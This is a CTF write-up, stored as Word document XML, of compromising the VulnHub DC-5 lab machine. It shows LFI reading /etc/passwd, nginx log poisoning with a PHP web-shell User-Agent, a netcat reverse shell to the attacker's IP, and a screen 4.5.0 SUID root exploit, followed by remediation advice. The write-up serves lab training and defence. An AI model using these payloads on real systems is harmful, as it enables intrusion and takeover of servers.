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VULNHUB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CTF PENETRATION TEST WRITE-UP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="240"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="C0392B" w:sz="8" w:space="4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Target Machine: DC-5  |  Difficulty: Intermediate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BB2B9"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Date: May 27, 2025  |  Author: Pavan Darade</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="1400"/>
      </w:pP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DC-5 features a web application vulnerable to Local File Inclusion (LFI). LFI was chained with Nginx log poisoning to achieve Remote Code Execution. Privilege escalation was accomplished by exploiting a SUID screen binary (GNU screen 4.5.0 — CVE-2017-5618).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VulnHub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(Debian 9)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Flags Captured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1  (Root Flag)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Root Access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 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27,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Pavan Darade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2. Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.1  Port Scanning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nmap -sV -sC -p- 192.168.56.106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80/tcp   open  http   nginx 1.6.2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111/tcp  open  rpcbind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43777/tcp open  unknown</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.2  Web Enumeration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Gobuster identified a contact form. Parameter fuzzing on thankyou.php revealed an LFI vulnerability via the 'file' parameter.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gobuster dir -u http://192.168.56.106 -w /usr/share/wordlists/dirb/common.txt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/contact.php  /thankyou.php  /solutions.php  /faq.php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wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/common.txt --hh 0 http://192.168.56.106/thankyou.php?FUZZ=test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LFI parameter found: 'file'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. Local File Inclusion (LFI)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.1  Confirming LFI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http://192.168.56.106/thankyou.php?file=../../../../etc/passwd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/etc/passwd contents displayed — LFI confirmed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.2  Reading Nginx Access Log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http://192.168.56.106/thankyou.php?file=../../../../var/log/nginx/access.log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Nginx access log readable via LFI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. Log Poisoning — RCE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.1  Injecting PHP into User-Agent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malicious PHP payload was injected into the Nginx access log via a crafted User-Agent header. The LFI then executed it.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-A "&lt;?php system(\$_GET['cmd']); ?&gt;" http://192.168.56.106/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2  Executing Commands via LFI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'http://192.168.56.106/thankyou.php?file=../../../../var/log/nginx/access.log&amp;cmd=id'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uid=33(www-data) gid=33(www-data)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.3  Reverse Shell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nc -lvnp 4444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'...&amp;cmd=nc+-e+/bin/bash+192.168.56.101+4444'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Connection from 192.168.56.106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www-data@dc-5:/$ python3 -c 'import pty;pty.spawn("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. Privilege Escalation — GNU screen SUID (CVE-2017-5618)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.1  SUID Binary Discovery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find / -perm -u=s -type f 2&gt;/dev/null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-rwsr-xr-x 1 root root 1588648 Feb 14  2017 /usr/bin/screen-4.5.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.2  Exploiting screen 4.5.0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GNU screen 4.5.0 contains a local privilege escalation vulnerability allowing arbitrary file write as root. The exploit creates a shared library and forces screen to load it.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searchsploit screen 4.5.0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GNU Screen 4.5.0 - Local Privilege Escalation | 41154.sh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bash 41154.sh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~ gnu/screenroot ~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root@dc-5:/# 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uid=0(root) gid=0(root) groups=0(root)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FLAG: flag{518790a...} — /root/thefinalflag.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6. Flag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Root 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/root/thefinalflag.txt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screen 4.5.0 SUID exploit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7. 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LFI (thankyou.php)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Unsanitised file parameter allows path traversal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Nginx Log Poisoning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LFI + injectable User-Agent = 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CVE-2017-5618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GNU screen 4.5.0 SUID local privilege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 File Exposure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 server log readable by www-data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8.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and whitelist file parameters — never pass user input directly to filesystem calls.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the SUID bit from screen: chmod u-s /usr/bin/screen-4.5.0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 GNU screen to the latest patched version.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web process permissions to prevent access to system log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 WAF rule to block path traversal sequences (../) in query parameters.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web server logs in directories inaccessible to the web application process.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9. Tools &amp;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Nmap, Gobuster, wfuzz — Scanning and parameter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curl — LFI exploitation and log poisoning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netcat — Reverse shell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Exploit-DB (41154.sh) — screen 4.5.0 exploit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CVE-2017-5618 — https://nvd.nist.gov/vuln/detail/CVE-2017-5618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VulnHub DC-5 — https://www.vulnhub.com/entry/dc-5,314/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10. Disclaimer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write-up was created solely for educational purposes as part of a CTF exercise on VulnHub. All testing was conducted in an isolated lab environment. Do not use these techniques against systems without explicit written authorisation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="C0392B" w:sz="4" w:space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BB2B9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">End of Report — VulnHub DC-5 CTF Write-Up — Pavan Darade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tabs>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="ABB2B9"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">Prepared by: Pavan Darade</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="ABB2B9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VulnHub DC-5 CTF Write-Up</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="ABB2B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after="160" w:before="360"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/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2026-05-27T13:49:20.744Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-27T13:49:20.744Z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